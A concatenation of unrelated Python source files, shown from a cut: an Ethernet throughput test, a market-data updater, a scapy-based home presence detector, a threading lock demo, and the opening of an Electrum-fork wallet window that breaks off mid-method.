tcp_read_speed = (tmp_total_tcp_data_words_read - last_total_tcp_data_words_read) * 32 / (tmp_time_read - time_read) / 10**6
if self.tcp_read_speeds is None: # add on second iteration
self.tcp_read_speeds = []
else:
self.tcp_read_speeds.append(tcp_read_speed)
if tcp_read_speed < 1.0:
logging.info("TCP read speed: %0.2f kbit/s" % (tcp_read_speed * 10**3))
else:
logging.info("TCP read speed: %0.2f Mbit/s" % tcp_read_speed)
if self.test_udp:
udp_read_write_speed = (tmp_total_udp_read_write_cnt - last_total_udp_read_write_cnt) * 64 / (tmp_time_read - time_read) / 10**6
if self.udp_read_write_speeds is None: # add on second iteration
self.udp_read_write_speeds = []
else:
self.udp_read_write_speeds.append(udp_read_write_speed)
if udp_read_write_speed < 1.0:
logging.info("UDP read/write speed: %0.2f kbit/s" % (udp_read_write_speed * 10**3))
else:
logging.info("UDP read/write speed: %0.2f Mbit/s" % udp_read_write_speed)
time_read = tmp_time_read
last_total_tcp_data_words_read = tmp_total_tcp_data_words_read
last_total_udp_read_write_cnt = tmp_total_udp_read_write_cnt
if self.total_udp_err_cnt > 10 or self.total_tcp_err_cnt > 10:
self.stop_thread.set()
logging.info("Stopping Monitor thread...")
def tcp_read(self):
logging.info("Started TCP thread")
fifo_data_last_value = -1
fifo_was_empty = 0
time_read = time.time()
while not self.stop_thread.wait(max(0.0, self.tcp_readout_delay - time_read + time.time())) or fifo_was_empty < 1:
time_read = time.time()
try:
fifo_data = self.dut['SITCP_FIFO'].get_data()
except Exception as e:
logging.error(e)
self.tcp_exception_cnt += 1
else:
if fifo_data.shape[0]:
self.total_tcp_data_words_read += fifo_data.shape[0]
if fifo_data[0] != fifo_data_last_value + 1:
logging.warning("TCP not increased by 1 between readouts")
self.total_tcp_err_cnt += 1
err_cnt = np.count_nonzero(np.diff(fifo_data) != 1)
if err_cnt:
logging.warning("TCP data not increased by 1: errors=%d" % err_cnt)
self.total_tcp_err_cnt += err_cnt
fifo_data_last_value = fifo_data[-1]
elif self.stop_thread.is_set():
fifo_was_empty += 1
if self.stop_thread.is_set():
time.sleep(max(0.0, self.tcp_readout_delay - time_read + time.time()))
logging.info("Stopping TCP thread...")
def udp_read_write(self):
logging.info("Started UDP thread")
time_read = time.time()
while not self.stop_thread.wait(max(0.0, self.udp_readout_delay - time_read + time.time())):
time_read = time.time()
write_value = int(np.random.randint(2**64, size=None, dtype=np.uint64)) # random.randint(0, 2**64 - 1)
try:
self.dut['REGISTERS'].TEST_DATA = write_value
except Exception as e:
logging.error(e)
self.udp_exception_cnt += 1
else:
try:
read_value = self.dut['REGISTERS'].TEST_DATA
except Exception as e:
logging.error(e)
self.udp_exception_cnt += 1
else:
self.total_udp_read_write_cnt += 1
if read_value != write_value:
logging.warning("UDP data not correct: read: %s, expected: %s" % (array('B', struct.unpack("BBBBBBBB", struct.pack("Q", read_value))), array('B', struct.unpack("BBBBBBBB", struct.pack("Q", write_value)))))
self.total_udp_err_cnt += 1
logging.info("Stopping UDP thread...")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Testing MMC3 Ethernet Interface %s\nExample: python test_eth.py -t 1.0 -d 6 --no-udp --no-tcp', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-w', '--deadline', type=float, metavar='<deadline>', action='store', help='timeout in seconds before application exits')
parser.add_argument('-i', '--interval', type=float, metavar='<interval time>', action='store', help='time interval in seconds for the monitor')
parser.add_argument('-d', '--delay', type=int, metavar='<clock cycles>', action='store', help='clock cycles between TCP writes')
parser.add_argument('--no_udp', dest='no_udp', action='store_true', help='disable UDP tests')
parser.add_argument('--no_tcp', dest='no_tcp', action='store_true', help='disable TCP tests')
parser.set_defaults(no_m26_jtag_configuration=False)
args = parser.parse_args()
config = {}
if args.deadline is not None:
config["deadline"] = args.deadline
if args.interval is not None:
config["monitor_interval"] = args.interval
if args.delay is not None:
config["tcp_write_delay"] = args.delay
if args.no_udp:
config["test_udp"] = False
if args.no_tcp:
config["test_tcp"] = False
test = Test()
test.start(**config)
|
update_ohlc.py | import os
import sys
from multiprocessing import Process
sys.path.append('src')
from DataSource import IEXCloud, Polygon # noqa autopep8
from Constants import PathFinder, POLY_CRYPTO_SYMBOLS, FEW_DAYS # noqa autopep8
import Constants as C # noqa autopep8
iex = IEXCloud()
poly = Polygon(os.environ['POLYGON'])
stock_symbols = iex.get_symbols()
crypto_symbols = POLY_CRYPTO_SYMBOLS
all_symbols = stock_symbols + crypto_symbols
# Double redundancy
# 1st pass
def update_iex_ohlc():
for symbol in stock_symbols:
try:
iex.save_ohlc(symbol=symbol, timeframe='1d',
retries=1 if C.TEST else C.DEFAULT_RETRIES)
except Exception as e:
print(f'IEX Cloud OHLC update failed for {symbol}.')
print(e)
finally:
filename = PathFinder().get_ohlc_path(
symbol=symbol, provider=iex.provider)
if C.CI and os.path.exists(filename):
os.remove(filename)
# 2nd pass
def update_poly_ohlc():
for symbol in all_symbols:
try:
poly.save_ohlc(symbol=symbol, timeframe=FEW_DAYS, retries=1)
except Exception as e:
print(f'Polygon.io OHLC update failed for {symbol}.')
print(e)
finally:
filename = PathFinder().get_ohlc_path(
symbol=symbol, provider=poly.provider)
if C.CI and os.path.exists(filename):
os.remove(filename)
p1 = Process(target=update_iex_ohlc)
p2 = Process(target=update_poly_ohlc)
p1.start()
p2.start()
p1.join()
p2.join()
|
scapy-watch.py | #!/usr/bin/env python
"""
Proof of concept for monitoring network for setting home automation use
not ready for prime time of any kind
"""
__author__ = "Peter Shipley"
from scapy.all import *
from threading import Thread
import ISY
import time
import socket
import signal
verbose=1
conf.verb=1
import argparse
last_seen = dict()
targets_dict = dict()
iface="em0" # eth0
myisy = None
target_var="is_home"
isy_var=None
target_ip="10.1.1.104"
target_mac="60:be:b5:ad:28:2d"
#target_mac=None
time_fmt="%Y-%m-%d %H:%M:%S"
event_thread = None
time_sleep=300
time_recheck=600
time_away=900
#time_sleep=60
#time_recheck=120
#time_away=300
is_home=-1
# pcap_filter="arp and ether src 60:be:b5:ad:28:2d"
# print time.asctime( time.localtime())
def Exit_gracefully(signal, frame):
print "Exiting in a Graceful way"
is_home=-1 # assert not home
set_home(False)
sys.exit(0)
def set_home(state) :
global is_home
global isy_var
if state == is_home :
return
is_home = state
if is_home :
isy_var.value = 1
else :
isy_var.value = 0
print "\n>>>>", time.strftime(time_fmt, time.localtime()), " is_home = ", is_home, "\n"
def arp_monitor_callback(pkt):
global target_ip
global target_mac
global last_seen
eaddr = None
t = time.strftime(time_fmt, time.localtime())
if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
eaddr = pkt[ARP].hwsrc
if target_ip is None :
target_ip = pkt[ARP].pdst
print "arp_mon set target_ip = ", target_ip
pktinfo = pkt.sprintf("{0}\t%ARP.hwsrc% %ARP.psrc% %ARP.op% %ARP.pdst%".format(t))
elif TCP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\tTCP %Ether.src% %Ether.dst% %IP.src%:%TCP.sport% %IP.dst%:%TCP.dport%".format(t))
set_home(True)
elif UDP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%IP.proto% %Ether.src% %Ether.dst% %IP.src%:%UDP.sport% %IP.dst%:%UDP.dport%".format(t))
elif IP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%IP.proto% %Ether.src% %Ether.dst% %IP.src% %IP.dst%".format(t))
elif Ether in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%Ether.src% %Ether.dst% ".format(t))
elif "802.3" in pkt :
eaddr = pkt[802.3].src
pktinfo = pkt.sprintf("{0}\t802.3 %802.3.src% %802.3.dst% ".format(t))
else :
pkt.show()
return "???"
set_home(True)
prev_seen = last_seen[eaddr]
last_seen[eaddr] = int(time.time())
if verbose :
time_since = last_seen[eaddr] - prev_seen
print "Time_since = {0} sec = {1} min {2} sec".format(
time_since,
*divmod( time_since , 60) )
# int(time_since/60),
#int(time_since%60)
#)
return pktinfo
def icmp_ping(ip) :
global target_mac
if ip is None :
return (None,None)
if target_mac is None :
ans,unans=srp(Ether()/IP(dst=ip)/ICMP(), timeout=2)
else :
ans,unans=srp(Ether(dst=target_mac)/IP(dst=ip)/ICMP(), timeout=2)
print "icmp_ping : ", ip, " ans = ", len(ans), ", unans = ", len(unans)
if target_mac is None and ans :
(so,re) = ans[0]
target_mac = re[Ether].src
print "icmp_ping set target_mac = ", target_mac
return ans,unans
def arp_ping(ip) :
global target_mac
if ip is None :
return (None,None)
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip),
timeout=2, retry=2)
print "arp_ping : ", ip, " ans = ", len(ans), ", unans = ", len(unans)
if target_mac is None and ans :
(so,re) = ans[0]
target_mac = re[Ether].src
print "arp_ping set target_mac = ", target_mac
return (ans,unans)
#
# Send arp and/or pings if we have not heard from the target recently
#
def ping_loop() :
global target_mac
global target_ip
global last_seen
print "\nping_loop init"
arp_a, arp_u = arp_ping(target_ip)
arping(target_ip)
if len(arp_a) < 1 :
icmp_a,icmp_u = icmp_ping(target_ip)
if arp_a or icmp_a :
set_home(True)
last_seen[target_mac] = int(time.time())
print "\nping_loop start"
while True :
time.sleep(time_sleep)
print "sleep complete",
time_now = int(time.time())
time_since = time_now - last_seen[target_mac]
if time_since >= time_recheck :
print "arp_pinging",
a, u = arp_ping(target_ip)
if len(a) < 1 :
a, u = icmp_ping(target_ip)
if len(a) :
set_home(True)
last_seen[target_mac] = int(time.time())
continue
time.sleep(5)
time_since = time_now - last_seen[target_mac]
if time_since >= time_away :
print "last_seen = {0}".format(
time.strftime(time_fmt,
time.localtime(last_seen[target_mac])))
print "time_since = {0} sec = {1} min {2} sec".format(
time_since,
*divmod( time_since , 60) )
set_home(False)
def do_it() :
global target_mac
global target_ip
global last_seen
global event_thread
global myisy
global isy_var
print "Starting : {0}".format(time.strftime(time_fmt, time.localtime()))
myisy = ISY.Isy(parsearg=1, faststart=1) # debug=0x80
if verbose :
print "time_sleep=", ( time_sleep / 60 )
print "time_recheck=", ( time_recheck / 60 )
print "time_away=", ( time_away / 60 )
isy_var = myisy.get_var(target_var)
print "isy_var = {:<4} : {:<19}{:<5}\t{:<5}\t{:}".format(
isy_var.id, isy_var.name, isy_var.value, isy_var.init, isy_var.ts )
signal.signal(signal.SIGINT, Exit_gracefully)
if target_mac is None :
ans,unans = icmp_ping(target)
if ans :
(so,re) = ans[0]
target_mac = re[Ether].src
print "target_mac = ", target_mac
assert( target_mac is not None )
pcap_filter="ether src {0}".format(target_mac)
last_seen[target_mac] = 0
event_thread = Thread(target=ping_loop, name="ping_looper" )
event_thread.daemon = True
event_thread.start()
print "sniff loop"
time.sleep(1)
# tcpdump -i em0 -v -v ether src 60:be:b5:ad:28:2d
sniff(prn=arp_monitor_callback, iface="em0", filter=pcap_filter, store=0)
def parse_args() :
global target_mac
global target_ip
global target_var
global iface
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mac", dest="target_mac",
default="60:be:b5:ad:28:2d",
help="Target Mac")
parser.add_argument("-a", "--addr", dest="target_ip",
default="10.1.1.104",
help="Target IP Addr")
parser.add_argument("-v", "--var", dest="target_var",
default="is_home",
help="Target ISY Var")
parser.add_argument("-i", "--interface", dest="iface",
default=None,
help="Network Interface")
args, unknown_args = parser.parse_known_args()
if args.target_ip :
target_ip = args.target_ip
if args.target_mac :
target_mac = args.target_mac
if args.target_var :
target_var = args.target_var
if args.iface :
iface = args.iface
if __name__ == '__main__' :
parse_args()
do_it()
exit(0)
|
lock_or_mutex.py | """
menggunakan lock/mutex untuk mengsinkronisasi akses ke shared resource
"""
import threading, time, random
counter = 0
lock = threading.Lock() # lock untuk mendapatkan akses ke shared resource
def worker(name):
global counter
for _ in range(10):
if lock.acquire(): # lock resource, only this thread can access resource
c = counter # critical code, possible race condition
time.sleep(random.random()) # critical code, possible race condition
counter = c + 1 # critical code, possible race condition
print(f"{name}: {counter}") # critical code, possible race condition
lock.release() # release lock, other thread can now try to lock resource
threads = []
for i in ['budi', 'susi', 'iwan']:
thread = threading.Thread(target=worker, args=(i,))
thread.start()
threads.append(thread)
for t in threads:
t.join()
print(f"counter: {counter}") |
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum LitecoinFinance - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum LitecoinFinance.") + " " +
_("Would you like to be notified when there is a newer version of Electrum LitecoinFinance available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum LitecoinFinance {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum LitecoinFinance Testnet" if constants.net.TESTNET else "Electrum LitecoinFinance"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
